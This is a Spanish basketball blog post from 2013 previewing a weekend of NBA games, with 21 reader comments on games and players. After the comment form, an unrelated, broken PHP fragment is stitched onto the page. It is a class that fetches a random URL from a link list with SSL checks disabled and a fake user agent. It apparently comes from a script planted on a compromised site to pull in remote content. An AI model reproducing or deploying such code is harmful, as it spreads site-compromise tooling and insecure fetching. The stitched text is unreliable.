Black Finde

29 de November de 2013 por TheDeerHunter

Qué cabeza la nuestra. Tras el receso baloncestístico de anoche por poco se nos olvida dejaros la paradita abierta para cubrir el fin de semana. Nada menos que 28 partidos… Empezando por esta noche, a petición especial de Denise, maratón de 12+1. ¿No querías sopa? Pues toma, dos tazas.

Así que empezaremos esta noche a la 1AM con atención especial al Heat@Raptors; al mismo tiempo que Spurs@Magic y un Bucks@Bobcats sólo para los más viciosos. A la 1:30AM un interesante Mavs@Hawks y el Lakers@Pistons, más Cavs@Celtics. A las 2AM, plato fuerte un tanto devaluado con los Warriors en horas bajas visitando el inexpugnable bastión de los Thunder; también a la misma hora Nets@Rockets, Wizards@Pacers y Pelicans@Sixers. A las 3AM tenemos el Knicks@Nuggets y el Suns@Jazz. Terminando a las 4AM con el Clippers@Kings que, posiblemente, sólo verá en directo en España nuestro Sancho.

El resto de fin de semana algo mejor repartidos. 7 el sábado y 8 el domingo.

Mañana destacan dos potentes duelos en el oeste. Wolves@Mavs (2:30AM) y Rockets@Spurs a la misma hora. Habrá que dividirse. Además tendremos el interesante Hawks@Wizards (1AM), Bulls@Cavs, Nets@Grizzlies, Jazz@Suns y Celtics@Bucks.

Domingo no nos podremos perder el Pacers@Clippers a las 21:30h. Además hay un Wolves@Thunder y un Blazers@Lakers apetitosísimos. El fin de semana se completa con Nuggets@Raptors, Sixers@Pistons, Warriors@Kings, Bobcats@Kings y Pelicans@Knicks.

¡¡Pasadlo bien!!

Comenta

21 comentarios a esta entrada

  1. Mamba_Blanca dice:
    #1

    Pau vs Drummond, la mejor forma posible de ver el estado físico del español.

      Citar

  2. Denise dice:
    #2

    Wow, los duelos GSW-OKL se estan conviertiendo en una pasada. Ayer, el partido se fue a la prorroga y Westbrook con un triple inverosimil a 1 decima del final que les hizo ganar despues de que los Warriors no controlaran el rebote defensivo y le dejaran 3 posesiones a los Thunder.

    Ante la baja de Paul, partidazo de Crawford 31-7-11 echandose el equipo a las espaldas. Buen estreno de Derrick Williams con los Kings con 12-6-4. Veremos si es capaz de mantener estos numeros.

    Partido sin historia entre SAS y ORL. Los de Popovych arrasaron y muestra de ello es que el que mas jugó fue Belinelli con 26 minutos. Oladipo al menos solo acabó con 2 perdidas de balon. Ultimamente Vaughn está reduciendole muchos minutos a Harkless y eso no me gusta nada. Este chico es muy bueno aunque está demasiado encasillado en el rol de especialista defensivo cuando tiene potencial para aportar mas aun en ataque.

    Que partido mas tonto el que se le ha escapado a los Mavs ante unos Hawks sin Kyle Korver. Todo el partido ganando por rentas de mas de 10 puntos (70-53 a 4 minutos de acabar el 3º cuarto) hasta que se les hizo el aro pequeño, lo que aprovechó Teague para meterle 8 puntos en el ultimo cuarto y Horford con un tiro de 6 metros le s dio la victoria a 4 segundos del final.

    Y los 4 equipos de siempre (Nets, Kinicks, Pistons y Cavs) convirtiendose en el hazmerreir de la liga, en especial los Nets. Nueva derrota humillante por 19 puntos (que llegó a ser de 28 a principios del tercer cuarto) ante unos Rockets que empiezan a dar sintomas de cohesión y de mayor profundidad de banquillo.
    Los titulares de Brooklyn solo anotaron 25 puntos y gracias a los 16 del bueno de Brook Lopez, porque entre Paul Pierce y JoJo se marcaron entre ambos 7 puntos y 3 de 16 en tiros. El banquillo como siempre es lo unico que funcionó. Es hora de que Kidd demuestre tener huevos y ponga a Anderson y a Plumlee de titulares, y a Pierce darle un buen banquillazo.

    Los Cavs de Mike Brown haciendo el ridiculo otra vez ante Boston. Muchos factores explican la desatrosa campaña, entre que Brown me parece un patetico coach, que elige a Bennet que es una castaña, Varejao y Clark estan a años luz del nivel del año pasado y Bynum es ya un ex-jugador de baloncesto. A este paso, los Cavs tendrán la potra de todos los años de llevarse el pick 1 del proximo Draft y gafar al jugador que elijan.

    Los Pistons pfff…otra banda con el equipazp que tienen.., si no eres capaz con esos jugadorazos de defender a dos tios como Wesley Johnson y Sjawne Williams y te comes 12 triples entre ambos, apaga y vamonos. Los Lakers juegan mejor sin Nash y sin la abuela conservadora de Kaman.

    Y los Knicks vuelven a perder, salvandose solamente Melo y Bargnani. El italiano creo que esta cuajando una muy buena temporada en la Gran Manzana y es el unico que veo que esté jugando por encima de su nivel habitual. Eso si, en detrimento de Melo, debo decir que no le llega a Lebron ni a Durant ni a la altura de los tobillos. En la ultima jugada para forzar la prorroga, Melo está posteando ante un Randy Foye que medirá como 12 cms y pesara como 15 kilos menos que él, y Melo no es capaz ni de lanzar un tiro que toque el aro.
    Muy bien Denver, que tras un mal inicio lleva un 8-2 en los utimos 10 partidos.

      Citar

  3. Ruxixón dice:
    #3

    Pregunta,¿no está pisando la línea Westbrook en el buzzer beater?He visto el resumen en ESPN y me da esa sensación totalmente.

      Citar

  4. Denise dice:
    #4

    Ruxixón:
    Pregunta,¿no está pisando la línea Westbrook en el buzzer beater?He visto el resumen en ESPN y me da esa sensación totalmente.

    Para mi, no pisa la linea. Ver minuto 1:44 de este video
    Lo que si me ha parecido es muy fria la celebración entre Durant y Westbrook, un leve golpecito en el pecho y punto. Incluso en el segundo 45 en vez de disfrutar de la victoria, está como discutiendo con Brooks.

      Citar

  5. The wolf dice:
    #5

    El pase de Henderson es malísimo, ahora bien… punteria tiene el chaval y mucha

      Citar

  6. Jose Luis dice:
    #6

    A mi lo que me parece de risa es lo de los relojes en los ultimos segundos de la NBA.

    Es según le de, ¿quien controla esto? ¿Es un sensor, una máquina, el mesa?

    El triple de Westbrook entra a falta de 0.5 no 0.1, y hay muchísimos más casos que a veces entra hasta con 0.6 y ya dejan el reloj y finaliza el partido.

    En fin, triplazo 🙂

      Citar

  7. Jose Luis dice:
    #7

    Dios mio…

    THE FACT: The Pistons, who were second only to Houston in points in the paint with a 49.5 per game average, lost despite a 76-28 advantage in points in the paint. They didn’t have an outside basket until Greg Monroe’s 16-footer with 6:57 remaining in the third quarter.

    Increíble…

      Citar

  8. Ruxixón dice:
    #8

    @Denise: en las dos primeras tomas parece que pisa pero efectivamente,en ese 1:44 se aprecia que tiene el pie girado de tal manera que justo no pisa la línea,y esa es la toma buena.Gracias porque sólo lo había visto desde una perspectiva.

    @Jose Luis: es lo que tiene ser el PEOR equipo en defensa de toda la liga,que se dice pronto.

      Citar

  9. Jose Luis dice:
    #9

    Ruxixón:

    @Jose Luis: es lo que tiene ser el PEOR equipo en defensa de toda la liga,que se dice pronto.

    Nos hemos liado xd

    Lo que me parece increíble es que hasta mediados del 3er cuarto, no metiesen ninguna canasta fuera de la pintura.

      Citar

  10. Ruxixón dice:
    #10

    Jose Luis: Nos hemos liado xd

    Lo que me parece increíble es que hasta mediados del 3er cuarto, no metiesen ninguna canasta fuera de la pintura.

    Pensaba que lo decías por el hecho de cómo podían perder con esa diferencia anotadora en la pintura,jajajaj.Lo del tiro exterior es otra rémora en su juego,está claro.

      Citar

  11. franitis dice:
    #11

    Una cuestión, ¿Empieza Jared Sullinger a oler un poco a MIP? Así como quien no quiere la cosa se está poniendo en un promedio de 14 ppp y 7 rpp y subiendo… Y ojito que los Celtics con 7-11 son segundos de la Atlantic y últimos en entrar en PO del este, dado el [ironic mode=on]GRANDÍSIMO[ironic mode=off] nivel que aporta la conferencia Este…

    Leyendo vuestros comentarios de la anterior entrada sobre que Boston ha salido mejor parado en el trade VS Nets, Wallace aporta lucha pero poco más y Humphries, que era lo, a priori, menos bueno del trade, está aportando bastante desde el banco. Lo que me gusta de Boston este año es que al ser un equipo joven en reconstrucción se puede permitir el lujo de experimentar hasta encontrar el quinteto titular y las rotaciones correctas, dando proyección a sus jugadores más jóvenes, a la espera de la reaparición de Rondo. Me está gustando mucho Brad Stevens… Ahí también hemos ganado a Nets, al menos Boston ha fichado un ENTRENADOR, no un guionista malo de escenas de acción de serie B, Mr. “Hit me”.

      Citar

  12. rumbero dice:
    #12

    Denise:
    Los Cavs de Mike Brown haciendo el ridiculo otra vez ante Boston. Muchos factores explican la desatrosa campaña, entre que Brown me parece un patetico coach, que elige a Bennet que es una castaña, Varejao y Clark estan a años luz del nivel del año pasado y Bynum es ya un ex-jugador de baloncesto. A este paso, los Cavs tendrán la potra de todos los años de llevarse el pick 1 del proximo Draft y gafar al jugador que elijan.

    Te ha ledio Bynum esta madrugada. Está para lo que su cabeza y rodillas le dejan, pero cuando se pone… Hoy en 30 minutos se ha merendado en ambos lados a un tío como Noah. Un lujo verlo jugar así.

    Y gran partido en San Antonio. Se escapaban los Rockets de 20 puntos antes de acabar la primera parte gracias a los triples y a un momento de inspiración de la dupla García – Casspi hasta que Parker en 2 minutos lo ha dejado en 10 para que no se les escapara el asunto. Brillante tercer cuarto para llegar igualados al último y lamentablemente (y como no podía ser de otra forma) nos hemos tenido que comer el Hack-a-Howard y el No-Hack-a-Harden-Pero-da-igual-que-me-voy-a-linea-de-tiros-libres-pase-lo-que-pase. No les ha salido muy bien lo primero. De hecho en una de estas el pillo de Harden ha aprovechado para tirar de tres mientras le hacían falta a Dwight y se ha llevado 3 tiros. Buena victoria de Houston que empieza a funcionar muy bien, coincidiendo “casualmente” con la entrada de Terrence Jones como PF titular. Ojo con él.

      Citar

  13. Denise dice:
    #13

    rumbero: Te ha ledio Bynum esta madrugada. Está para lo que su cabeza y rodillas le dejan, pero cuando se pone… Hoy en 30 minutos se ha merendado en ambos lados a un tío como Noah. Un lujo verlo jugar así.

    jaja y creo que tengo razón. No he dicho que sea malo, pero no está para muchos trotes. El partido de esta noche es un espejismo, su temporada está siendo un desastre y no está como para estar jugando cada dos días.

    Ricky es otro que lee este blog, dije lo de involución, al dia siguiente se marcó un partidazo y despues de eso está jugando normal. Bien porque es bueno, pero en mi opinión no le está dando un plus al equipo. Suerte tienen los Wolves de que Martin esta haciendo un temporadón brutal, muy consistente y regular.

      Citar

  14. Denise dice:
    #14

    Una pregunta, estaba viendo estadisticas de la NCAA, y ¿es normal que los teoricos top 10 apenas salgan en las mejores posiciones de las estadisticas? Por ejemplo el tal Wiggins no aparece ni entre los 50 mejores anotadores. Solo Randle lo veo como 2º maximo reboteador y pocos mas nombres me suenan entre las primeras plazas de las principales categorias. ¿Esto es normal? ¿La idiosincrasia de la competicion lleva a que numericamente haya jugadores mejores que los tops del Draft?

      Citar

  15. Ruxixón dice:
    #15

    Hay varios motivos para ello,en el caso de esta camada hay muchos freshman que aún están aclimatándose al juego de sus equipos,equipos que muchas veces tienen que reinventarse cada muy poco tiempo,ya sea porque sus jugadores acaban ciclo o porque saltan a la NBA.Después son varios los casos donde se aglutina mucho talento en un mismo equipo,de ahí que no sea tan fácil de destacar numericamente.

      Citar

  16. Ruxixón dice:
    #16

    (sigue que se me cortó el mensaje) Por otra parte también influye el nivel de las conferencias/rivales.Si un buen jugador juega sus partidos en una conferencia donde no hay equipos ranqueados(los mejores equipos vaya) es más probable que tenga mejor hoja de estadísticas.

    Supongo que hay que coger las estadísticas con cautela,más si tenemos en cuenta que se están jugando torneos menores.

      Citar

  17. Denise dice:
    #17

    Ruxixón:
    (sigue que se me cortó el mensaje) Por otra parte también influye el nivel de las conferencias/rivales.Si un buen jugador juega sus partidos en una conferencia donde no hay equipos ranqueados(los mejores equipos vaya) es más probable que tenga mejor hoja de estadísticas.

    Supongo que hay que coger las estadísticas con cautela,más si tenemos en cuenta que se están jugando torneos menores.

    Ok, pero en la NCAA hay 3 divisiones creo, todos los top’s juegan en la Division I, no?

      Citar

  18. Ruxixón dice:
    #18

    Supongo que al 99.99% si,no sé si habrá algún caso de jugador importante de una universidad de la Division II ó III a lo largo de la historia,sería sin duda un caso extraño.

      Citar

  19. Simon dice:
    #19

    Wow!! Denver jugando gran parte del último cuarto con un perimetro formado por Robinson, Lawson, y Millers, con Wilson Chandlers de 4 y Mozgov de 5. Eso que es? el super mini-small ball o que??

      Citar

  20. franitis dice:
    #20

    Tan pronto hablo de los Celtics como un equipo medianamente bueno que va y pierde con los Bucks con un récord previo de 2-13… Pero en lo de Sullinger sí que no voy desencaminado, 21 pros. 14 rebotes… hay chicha…

      Citar

  21. Mamba_Blanca dice:
    #21

    Partidazo de momento de Indiana imponiendose a los Clippers, a Griffin después de este partido los niños le van a salir con perilla.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>